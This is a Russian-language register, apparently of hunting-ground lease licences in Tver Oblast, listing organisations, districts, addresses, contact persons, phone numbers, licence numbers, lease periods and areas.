13.11.08-13.11.57
33,6840
РОУОиР «Велеса» (Западнодвинский р-н) 172610, Тверская область, г. Западная Двина, ул. Парковая, д. 39 495-764-80-85 Лукин Евгений Евгеньевич 69 № 000006
13.11.08-13.11.57
15,3240
ООО «Спектр»
(Старицкий р-н)
170000, г.Тверь, ул. Бассейная, 2/12
777-636 Бурлака Олег Григорьевич 69 № 000007 (0000018)
13.11.08-13.11.57
20,0000
ООО «Диана» (Западнодвинский р-н) 127576 , г. Москва, Алтуфьевское шоссе, 89 8-916-602-72-44 Каюмов Рустам Раисович 69 № 0000011
14.11.08-14.11.57
32,5000
ООО «Охотничье хозяйство «Старо-Торопское» (Западнодвинский) Тверская обл., г.Зап. Двина, ул. Кирова, д. 6 8-960-715-79-84 Амосов Анатолий Михайлович 69 № 0000012
18.11.08-18.11.57
47,3000
ООО «Охотхозяйство «Русское раздолье» (Фировский р-н) Тверская обл., Фировский р-н, п. Великооктябрьский, ул.Профсоюзная, 2
8-910-646-38-27 Алексеев Дмитрий Вячеславович 69 №0000014
23.01.09-23.01.58
22,0000
ООО «Мелеча» (Молоковский р-н) г. Тверь, ул. Веселова, д.12, оф. 1 8-910-647-79-36 Арсеньев Михаил Юрьевич 69 № 0000015
23.01.09-23.01.58
9,3920
ООО «Малиновка» 172400 Тверская обл., п. Оленино, ул. Кузьмина, д.93 8-960-711-56-16 Колоколов Г.Н. 69 № 0000016
28.01.09-28.01.58
19,0000
ООО «Верхнешошенское» (Зубцовский р-н)
127300, Тверская область, Зубцовский район, д. Кузьминка, д. 21 8-916-106-95-18 Логачев Александр Дмитриевич 69 № 0000020
02.04.09-02.04.58
22,5693
ТООУ "Квант-М" Лихославльский р-н 170003, г. Тверь, Петербургское шоссе, д. 45 б 495-926-88-30 Тиванов А.В. серия 69 № 0000021 от 01.06.2009 16,3000
НП "Охотничий клуб "Воспроизводство" Конаковский р-н. 171285, Тверская обл., Конаковский р-н, Вахонинское с.п., д. Сврдлово, ул. Каменка, д. 55   Орехов Вячеслав Фёдорович серия 69 № 0000022 от 08.06.2009 4,5290
серия 69 № 0000032 от 11.11.2009 1,5486
ООО "Охотничье хозяйство "Туросна" Жарковский р-н. 172453, Жарковский р-н, д. Лукьяново   Бабин Андрей Анатоьевич серия 69 № 0000023 от 09.06.2009 27,9000
ООО "Юридическое бюро "Содействие" Старицкий р-н. 171381, Тверская обл., Старицкий р-н, с. Степурино 8-910-939-74-77 Бруй Иван Константинович серия 69 № 0000024 от 28.08.2009 9,1547
Крестьянское (фермерское) хозяйство Бугаев В.А. Лихославльский р-н. Тверская обл., Калининский р-н, с. Медное, ул. Тверская, д. 5, кв. 41 8-910-648-87-82 Бугаев Владимир Анатольевич серия 69 № 0000025 от 29.09.2009 36,0240
ООО "Устье"
Жарковский р-н.
172461, Тверская обл., пос. Жарковский, ул. Меженская 8-960-707-54-81 Орлов Б.А. серия 69 № 0000026 от 06.10.2009 9,049
ООО "Беркут"
Калининский р-н
170043, г. Тверь, ул. 8 Марта, д. 18, стр. 1 8-910-647-04-43 Петров Андрей Алексеевич серия 69 № 0000028 от 22.10.2009 9,155
ООО "Волга-Мста-Сервис", Конаковский р-н 170039, г. Тверь, ул. Хромова, д. 23 8-915-749-60-96 Еременко Степан Николаевич серия 69 № 0000027 от 15.10.2009 23,216
НП "Спортивно-рыболовный клуб "ЗУЕВКА",
Конаковский р-н.
171282, Тверская обл., Конаковский р-н, д. Юрятино 8-905-606-44-21 Лисин Владимир Александрович серия 69 № 0000029 от 30.10.2009 13,1000
ООО "Дубки"
Ржевский район
172386, Тверская обл., г. Ржев, ул. 8 Марта, д. 33А 8-910-934-17-68 Марков Игорь Алексеевич серия 69 № 0000031 от 30.10.2009 12,3370
Крестьянское (фермерское) хозяйство "Воскресенское" Ржевский р-н. 172340, Тверская обл., г. Ржев, тракт Старицкий, д. 10, кв. 240 8-920-158-96-57 Гусев Сергей Дмитриевич серия 69 № 0000030 от 30.10.2009 16,0187
ООО "Элит Сервис +" Ржевский район 172333, Тверская обл., г. Зубцов, ул. Победы, д. 16, каб. 14 8-925-502-45-45 Шилков Юрий Игоревич серия 69 № 0000036 от 18.11.2009 7,3270
серия 69 № 0000037 от 18.11.2009 7,1060
ООО "Хубертус" Старицкий район 171360, Тверская обл., г. Старица, ул Карла Маркса, д. 48   Губченко Петр Евгеньевич серия 69 № 0000039 от 15.12.2009 19,6900
НП Охотничий клуб "Медвежий угол" Оленинский район 125315, г. Москва, Ленинградский пр-т, д. 68/1, стр. 1 8-916-672-56-84 Кубашев Николай Иванович серия 69 № 0000040 от 25.12.2009 7,0000
Ассоциация "Координации предпринимательской деятельности "Авто?кей" Торопецкий район 129348, г. Москва, ул. Красная Сосна, д. 3 8-985-923-18-77 Зигоренко Вячеслав Дмитриевич Шульпин Борис Дмитриевич серия 69 № 0000041 от 29.12.2009 13,2673
Ржевская районная общественная организация "Общество охотников и рыболовов" 172350, Тверская обл., г. Ржев, ул. Волосковская Горка, д. 4   Председатель правления Гусев Сергей Дмитриевич серия 69 № 0000042 от 29.01.2010 70,7648
Удомельское районное общественное учреждение охотников и рыболовов "Кезадра" 171840, Тверская обл., г. Удомля, ул. Северная, д. 4 8-910-930-12-46 Владимиров Анатолий Павлович серия 69 № 0000046 от 08.02.2010 10,4090
ООО "Расловка", Калязинский район 171560, Тверская обл., Калязинский р-н, Нерльское с/п, с. Нерль 8-910-930-94-72 Бондаренко С.Г. серия 69 № 0000045 от 08.02.2010 11,1180
ООО "Золотая Звезда", Старицкий район 121354, г. Москва, ул. Дорогобужская, д. 14, стр. 2 8-985-763-51-52 С.Б. Черкасов серия 69 № 0000047 от 26.02.2010 6,6640
ООО "Славяне", Старицкий район 171393, Тверская обл., Старицкий р-н, д. Беклово 8-906-727-35-22 А.В. Фокин серия 69 № 0000048 от 26.02.2010 7,6700
ООО "Руссо-Диз+",
Пеновский район
172770, пос. Пено, ул. Лизы Чайкиной, д. 103 8-920-156-17-00 И.В. Троицкая серия 69 № 0000049 от 03.03.2010 12,3000
ООО "Эскорт-В",
Калининский район
109444, г. Москва, ул. Ферганская, д. 13, корп. 5 495-763-27-36 Б.А. Сошников серия 69 № 0000051 от 05.03.2010 3,0000
ООО "Сафари",
Лихославльский район
171221, Тверская обл., Лихославльский р-н, с. Микшино, д. 4 8-910-431-63-22 Ермаков Александр Георгиевич серия 69 № 0000053 от 05.03.2010 9,7900
Крестьянское (фермерское) хозяйство "Картошино",
Ржевский район
172386, Тверская обл., г. Ржев, ул. Чкалова, д. 41, кв. 19 8-905-600-50-80 Гололобов Василий Алексеевич серия 69 № 0000054 от 12.03.2010 13,3560
ООО "Оршинский охотничий клуб"
Калининский, Конаковский р-ны
170535, Тверская обл., Калининский р-н, д. Видогощи, д. 42А 8-985-762-24-79 Раца Юрий Маркович серия 69 № 0000055
12.03.10-12.03.59
7,6800
ООО "Брау Сервис"
Старицкий р-н
170028, г. Тверь, ул. Коминтерна, д. 95 8-910-534-07-81 Дешевкин Вадим Николаевич серия 69 № 0000056
12.03.10-12.03.59
2,4200
ООО "Вепрь"
Конаковский р-н
171252, Тверская обл., Конаковский р-н, ул. Горького, д. 3-а 8-920-695-00-04 Родионов Алексей Александрович серия 69 № 0000058
22.03.10-22.03.59
3,6433
ООО "Островитовское охотхозяйство"
Бологовский р-н
171053, Тверская обл., Бологовский р-н, пос. Выползово, ул. Березовая, д. 10, кв. 60 8-906-654-65-57 Фадеев Алексей Владимирович серия 69 № 0000057
22.03.10-22.03.59
17,0000
ООО "Вепрь"
Торжокский р-н
170003, г. Тверь, Петербургское шоссе, д. 45 б 8-910-937-25-69 Кириллов Александр Алексеевич серия 69 № 0000061
22.03.10-22.03.59
4,6900
Региональная общественная организация охотников и рыболовов "Западная Двина" 172610, Тверская обл., г. Западная Двина, ул. Базарная, д. 24 48-265-2-22-07 Васильченко Игорь Иванович серия 69 № 0000059
22.03.10-22.03.59
45,7220
серия 69 № 0000060
22.03.10-22.03.59
5,4080
ООО "Дом"
Калининский, Торжокский
170024, г. Тверь, проспект Ленина, д. 18/1 8-903-805-68-08 Парфенов В.А. серия 69 № 0000065
30.03.10-30.03.59
24,8567
ООО "Осуга"
Ржевский
172389, Тверская обл., г. Ржев, ул. Бехтерева, д. 76 8-915-715-27-51 Бойцов Юрий Евгеньевич серия 69 № 0000066
30.03.10-30.03.59
2,9940
серия 69 № 0000063
22.03.10-22.03.59
11,3250
ООО "Русская охота"
Калининский
170100, г. Тверь, ул. Индустриальная, д. 19 8-910-833-77-50 Штырова Людмила Ивановна серия 69 № 0000067
22.03.10-22.03.59
4,3000
серия 69 № 0000068
22.03.10-22.03.59
5,7000
ООО "Славянская охота"
Калининский
170026, г. Тверь, Комсомольский пр-т, д. 5, корп. 1 8-960-715-33-33 Рубцов Игорь Викторович серия 69 № 0000071
30.03.10-30.03.59
18,5000
ООО "Сити Торг"
Калининский
170024, г. Тверь, пр-т Ленина, 18/1 8-910-647-10-91 Сергеев Роман Алексеевич серия 69 № 0000072
30.03.10-30.03.59
26,8150
ООО "Михайловское"
Калининский
170026, г. Тверь, Комсомольский пр-т, д. 5, корп. 1 8-960-715-33-33 Рубцов Игорь Викторович серия 69 № 0000073
30.03.10-30.03.59
11,0000
ООО "Гришкино"
Западнодвинский
171220, Тверская обл., Лихославльский р-н, Микшинское с.п., д. Гришкино 8-960-705-44-44 Метелев Виталий Юрьевич серия 69 № 0000089
22.03.10-22.03.59
14,9680
ООО "Охотник"
Старицкий
170100, г. Тверь, ул. Симеоновская, д. 1, оф. 16 8-910-647-18-55 Корнев Сергей Борисович серия 69 № 0000075
30.03.10-30.03.59
10,9940
НП "Союз ветеранов спецслужб и спецподразделений"
Калининский
170006, г. Тверь, ул. Дм. Донского, д. 35 А 8-910-618-33-20;
8-910-647-34-00
Архипов Алексей Петрович серия 69 № 0000076
30.03.10-30.03.59
6,0000
ООО "Пятницкое"
Ржевский
172346, Тверская обл., Ржевский р-н, д. Павлюки 8-985-776-32-80;
8-920-681-90-06
Мешканин Андрей Александрович серия 69 № 0000077
30.03.10-30.03.59
10,9650
ООО "Тверской охотник"
Рамешковский
170001, г. Тверь, Комсомольский пр-т, д. 5, кор. 1 8-960-705-44-44 Метелев Виталий Юрьевич серия 69 № 0000069
22.03.10-22.03.59
7,0000
ООО "Губернский охотник"
Нелидовский
г. Тверь, просп. Комсомольский, д. 5, корп. 1 8-960-705-44-44 Метелев Виталий Юрьевич серия 69 № 0000080
30.03.10-30.03.59
11,8000
ООО "Рождественское охотхозяйство"
Калининский,
Конаковский
170505, Тверская обл., Калининский р-н, д. Борзенево, д. 25 8-905-601-26-69 Чернов Евгений Леонидович серия 69 № 0000079
22.03.10-22.03.59
7,0000
ООО "Спортивно-охотничий клуб "Оршинский"
Калининский,
Конаковский
170006, г. Тверь, Краснофлотская набережная, д.9 8-985-922-12-51 Коротков Олег Вениаминович серия 69 № 0000078
22.03.10-22.03.59
7,3200
ООО "Макаровское"
Ржевский
172351, Тверская обл., Ржевский р-н, п. Макарово, д. 16 8-960-709-06-97 Константинов Андрей Викторович серия 69 № 0000064
30.03.10-30.03.59
26,9388
ООО "Елисей"
Калининский
170100, г. Тверь, ул. Индустриальная, д. 19 8-906-655-66-44 Монахов Сергей Владимирович серия 69 № 0000062
30.03.10-30.03.59
16,5960
ООО "Ступинское"
Ржевский
172388, Тверская обл., г. Ржев, Осташковское шоссе, 11 8-905-609-04-86 Александров Валерий Валентинович серия 69 № 0000081
30.03.10-30.03.59
13,1090
ООО "Краснолесье"
Нелидовский
172500, Тверская обл., Нелидовский р-н, п. Южный, Бельское шоссе 8-906-654-23-52 Никитин Сергей Юрьевич серия 69 № 0000088
30.03.10-30.03.59
6,8000
ООО "Конаковская охота"
Кимрский
170001, г. Тверь, пр-т Калинина, д. 7/6   Лебедева Н.Ю. серия 69 № 0000082
30.03.10-30.03.59
9,8180
ООО "Венатор"
Нелидовский
г. Тверь, Комсомольский пр-т, д. 5, корп. 1 8-960-705-44-44 Метелев Виталий Юрьевич серия 69 № 0000083
30.03.10-30.03.59
12,5000
ООО "Волжские просторы"
Калининский
170001, г. Тверь, Комсомольский пр-т, д. 5, кор. 1 8-960-715-33-33 Рубцов Игорь Викторович серия 69 № 0000070
22.03.10-22.03.59
10,0000
ООО "Лесная поляна"
Калязинский
171573, Тверская область, г. Калязин, ул. Коминтерна, д. 38/15 8-915-728-96-20;
48-249-2-00-22
Кириллов Александр Гурьевич серия 69 № 0000084
30.03.10-30.03.59
10,4000
AddThis Social Bookmark Button